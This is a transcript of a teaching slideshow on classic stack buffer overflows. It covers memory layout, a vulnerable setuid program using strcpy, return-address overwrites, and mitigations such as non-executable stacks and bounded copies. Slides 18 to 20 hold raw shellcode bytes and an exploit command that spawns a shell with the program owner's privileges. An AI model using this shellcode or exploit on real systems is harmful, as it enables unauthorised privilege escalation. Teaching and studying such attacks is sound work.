
Basic of Buffer Over Flow

Basic of Buffer Over Flow. S.S.G 방승원. Agenda. Introduction Memory Structure Stack Structure while Example Target Program Ready & Attack Attack & Security Application of Overflow. Introduction. Overflow ?? To overflow, to spill over; to flood; (of a container, etc.) to be full, to brim over. Buffer Over Flow ??

korene

Presentation Transcript


  1. Basic of Buffer Over Flow
     S.S.G 방승원

  2. Agenda
     • Introduction
     • Memory Structure
     • Stack Structure while Example
     • Target Program
     • Ready & Attack
     • Attack & Security
     • Application of Overflow

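  3. Introduction
     • Overflow ??
       • To overflow, to spill over; to flood;
       • (of a container, etc.) to be full, to brim over
     • Buffer Over Flow ??
       • An attack that takes in more data than the allotted memory and overwrites a particular region, changing the program flow so that code of the attacker's choosing is executed
       • <Phrack Magazine 49-14>, Aleph One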

  4. Memory Structure
     Regions from LOW to HIGH addresses: TEXT, DATA, HEAP, STACK
     • TEXT : Program Code
     • DATA : Static Variable, Global Variable
     • HEAP : Dynamic Allocation
     • STACK : Dynamic Variable, Local Variable

  5. Stack Structure
     • LIFO (Last In First Out)
     • PUSH
     • POP
     • SP (Stack Pointer)
     • BP (Base Pointer)
     [Figure: a stack holding C, B, A, drawn between "Memory LOW (0x08048000) / Stack HIGH" and "Stack LOW / Memory HIGH (0xbfffffff)", with PUSH and POP arrows and the labels SP and BP]

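  6. Example Program

     ```c
     #include <stdio.h>

     void func(int a, int b, int c)
     {
         int buf1;        /* local variable, lives in func's stack frame */
         char buf2[16];   /* local buffer, lives in func's stack frame */
     }

     int main(void)
     {
         func(1, 2, 3);
         printf("Hello, World!\n");
         return 0;
     }
     ```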

  7. Example Program
     [Figure: the slide 6 source beside its stack, drawn between "Memory LOW (0x08048000) / Stack HIGH" and "Stack LOW / Memory HIGH (0xbfffffff)". Stack contents in the order shown: buf2, buf1, Stack Frame Pointer, Return Address, 1, 2, 3. The figure also marks ESP and EBP.]

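  8. Example Program

     ```asm
     main:
         pushl $3
         pushl $2
         pushl $1
         call  func
         addl  $16, %esp

     func:
         pushl %ebp
         movl  %esp, %ebp
         subl  $40, %esp
         leave               # restores %esp from %ebp, then pops %ebp
         ret
     ```

     [Figure: the stack drawn between "Memory LOW (0x08048000) / Stack HIGH" and "Stack LOW / Memory HIGH (0xbfffffff)". Stack contents in the order shown: buf2, buf1, Dummy, Stack Frame Pointer, Return Address, 1, 2, 3. The figure also marks ESP and EBP.]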

  9. Target Program

     ```c
     #include <stdio.h>
     #include <string.h>

     void func(char *str)
     {
         char buf[64];
         strcpy(buf, str);   /* no length check: this is the overflow studied on the next slides */
     }

     int main(int argc, char *argv[])
     {
         func(argv[1]);
         printf("Hello, World\n");
         return 0;
     }
     ```

     • argc, argv
       • How a program receives its arguments when it is run
       • ex) ./target bang 1234
         • argc = 3;
         • argv[0] = "target";
         • argv[1] = "bang";
         • argv[2] = "1234";
     • strcpy(dest, src)
       • Copies the string that src points to into dest
       • * There is no size limit, so an overflow vulnerability arises

  10. Target Program
      • The setuid bit is set: Set User ID Bit (number: 4000)

        ```
        $ chmod 4755 target (or chmod u+s)
        -rwsr-xr-x 1 level1 level1 target
        ```

        → Any user who runs this target gets the privileges of the user level1 while it runs. ex) passwd
      • Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5

  11. Target Program
      • Let's run the program with a lot of 'A' characters!!!
      • Result : Segmentation Fault
      • Why??

  12. Target Program
      [Figure: the slide 9 source beside its stack, drawn between "Memory LOW (0x08048000) / Stack HIGH" and "Stack LOW / Memory HIGH (0xbfffffff)". Stack contents in the order shown: buf, Dummy, SFP, RET, str = argv[1]. The figure also marks ESP and EBP.]

  13. Target Program

      ```
      $ ./target `perl -e 'print "A"x71'`
      ```

      Layout: buf (64 Bytes) | Dummy (8 Bytes) | SFP (4 Bytes) | RET (4 Bytes) | str = argv[1] (4 Bytes)
      Contents: [ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
      State: Normal

  14. Target Program

      ```
      $ ./target `perl -e 'print "A"x72'`
      ```

      Layout: buf (64 Bytes) | Dummy (8 Bytes) | SFP (4 Bytes) | RET (4 Bytes) | str = argv[1] (4 Bytes)
      Contents: [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
      State: Overflow

  15. Target Program

      ```
      $ ./target `perl -e 'print "A"x80'`
      ```

      Layout: buf (64 Bytes) | Dummy (8 Bytes) | SFP (4 Bytes) | RET (4 Bytes) | str = argv[1] (4 Bytes)
      Contents: [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ]
      State: Real Overflow

  16. Target Program

      ```asm
      func:
          pushl %ebp
          movl  %esp, %ebp
          subl  $72, %esp
          subl  $8, %esp
          pushl 8(%ebp)
          leal  -72(%ebp), %eax
          pushl %eax
          call  strcpy
          addl  $16, %esp
          leave
          ret

      main:
          movl  12(%ebp), %eax
          addl  $4, %eax
          pushl (%eax)
          call  func
          addl  $16, %esp
          subl  $12, %esp
      ```

      [Figure: the stack drawn between "Memory LOW (0x08048000) / Stack HIGH" and "Stack LOW / Memory HIGH (0xbfffffff)". Stack contents in the order shown: A A A A A A A A A, Dummy, SFP [ BFFFFFBF ], RET [ BBFFFF08 ], str. The figure also marks ESP and EBP.]

  17. Target Program
      Same func and main listing as on slide 16.

      [Figure: the stack drawn between "Memory LOW (0x08048000) / Stack HIGH" and "Stack LOW / Memory HIGH (0xbfffffff)". Stack contents in the order shown: A A A A A A A A A, Dummy [ AAAA ], SFP [ AAAA ], RET [ AAAA ], str. The figure is annotated "0x41414141(??)" and also marks ESP and EBP.]

  18. Shell Code
      • Code that launches a shell

      ```c
      #include <unistd.h>

      int main(void)
      {
          char *shell[2];

          setreuid(3001, 3001);   /* set real and effective uid to 3001 (level1 in the slide 20 output) */
          shell[0] = "/bin/sh";
          shell[1] = NULL;
          execve(shell[0], shell, NULL);
          return 0;
      }
      ```

      Assembled code:

      ```c
      "\x31\xc0\x31\xdb\x31\xc9\x66\xbb"
      "\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46"
      "\xcd\x80"
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88"
      "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
      "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
      "\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      ```

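  19. Attack Ready
      • Confirm the Segmentation Fault
      • Write the shellcode
      • When the shellcode is placed in the buffer, the address of that buffer has to be found
      • But the buffer's address is hard to guess
      • So use Eggshell, which places the shellcode in a shell environment variable and calculates the shellcode's address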

  20. Attack

      ```
      bash-2.05b$ ./egg 512 200
      Using address: 0xbffffa60
      bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")`
      sh-2.05b$ id
      uid=3001(level1) gid=1000(guest) groups=1000(guest)
      sh-2.05b$
      ```

  21. Attack V.S Security
      • Non-executable Stack → Return Into Libc → Omega Project
      • Stack Guard and Stack Shield → Bypass Stack Guard and Stack Shield
      • Random Stacks
      • Exec Shield (kernel level) → Exec Shield evasion
      • Avoid using strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf(), etc. -> use strncpy(), strncat()
      • And so on...

  22. Application of Overflow
      • Windows, Unix, Linux, Mac
      • Local, Remote
      • Web -> ActiveX
      • Heap Overflow
      • Integer Overflow
      • Frame Pointer Overwrite
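The arithmetic behind slides 13 to 15, as an added example that is not part of the original presentation: it maps an argument length to the highest frame region that the strcpy() in func() writes, using the slides' sizes (64, 8, 4, 4, 4). The enum and function names are made up for this illustration.

```c
#include <stddef.h>
#include <stdio.h>

/* Frame of func() as drawn on slides 13-15, from low to high address.
 * Sizes are the slides' numbers for that gcc 3.2.2 build, not a general rule. */
enum region { BUF, DUMMY, SFP, RET, STR, BEYOND };
static const char *const NAME[] = { "buf", "Dummy", "SFP", "RET", "str", "beyond" };
static const size_t SIZE[] = { 64, 8, 4, 4, 4 };

/* Region containing the byte at `offset` bytes above buf[0]. */
enum region region_at(size_t offset)
{
    size_t end = 0;
    for (int r = BUF; r <= STR; r++) {
        end += SIZE[r];
        if (offset < end)
            return (enum region)r;
    }
    return BEYOND;
}

/* strcpy() stores strlen(arg) bytes plus a terminating NUL, so the NUL is
 * written at offset arg_len: that is the highest byte the copy touches. */
enum region highest_region_written(size_t arg_len)
{
    return region_at(arg_len);
}

/* How many of RET's 4 bytes the copy overwrites (the NUL counts as a write). */
size_t ret_bytes_overwritten(size_t arg_len)
{
    const size_t ret_start = SIZE[BUF] + SIZE[DUMMY] + SIZE[SFP];
    size_t written = arg_len + 1;
    if (written <= ret_start)
        return 0;
    return written - ret_start > SIZE[RET] ? SIZE[RET] : written - ret_start;
}

int main(void)
{
    const size_t lens[] = { 63, 71, 72, 80 };   /* 71, 72, 80 are the slides' cases */
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("len %2zu: NUL lands in %-5s, RET bytes overwritten: %zu\n",
               lens[i], NAME[highest_region_written(lens[i])],
               ret_bytes_overwritten(lens[i]));
    return 0;
}
```

The 72-byte case shows why slide 14 already counts as an overflow: only the terminating NUL leaves buf and Dummy, and it lands in the low byte of SFP.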
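One way to apply slide 21's advice to the slide 9 target, as an added example (not the presenter's code): the copy is rejected when the argument does not fit, and a second function shows why a bare strncpy() is not enough, since it leaves the buffer without a terminating NUL when the source fills it. copy_checked, func_checked and strncpy_unterminated are hypothetical names.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same size as buf in the slide 9 target */

/* Bounded replacement for the strcpy() call in func(): copies src into dst
 * only if it fits together with its terminating NUL. Returns 0 on success,
 * -1 if src is NULL or too long; dst is always left NUL-terminated. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    const char *end = memchr(src, '\0', dst_size);  /* look at dst_size bytes at most */
    if (end == NULL)
        return -1;                                   /* reject instead of truncating */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* The pitfall in "just use strncpy()": when src has sizeof dst or more
 * characters, strncpy() fills dst completely and writes no NUL.
 * Returns 1 if dst ends up unterminated, 0 otherwise. */
int strncpy_unterminated(const char *src)
{
    char dst[BUF_SIZE];
    strncpy(dst, src, sizeof dst);
    return memchr(dst, '\0', sizeof dst) == NULL;
}

/* func() from slide 9 with the copy bounded; -1 means the input was refused. */
int func_checked(const char *str)
{
    char buf[BUF_SIZE];
    return copy_checked(buf, sizeof buf, str);
}

int main(int argc, char *argv[])
{
    /* The original target also passes argv[1] without checking argc. */
    if (argc < 2 || func_checked(argv[1]) != 0) {
        fprintf(stderr, "usage: %s <string shorter than %d bytes>\n", argv[0], BUF_SIZE);
        return 1;
    }
    printf("Hello, World\n");
    return 0;
}
```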
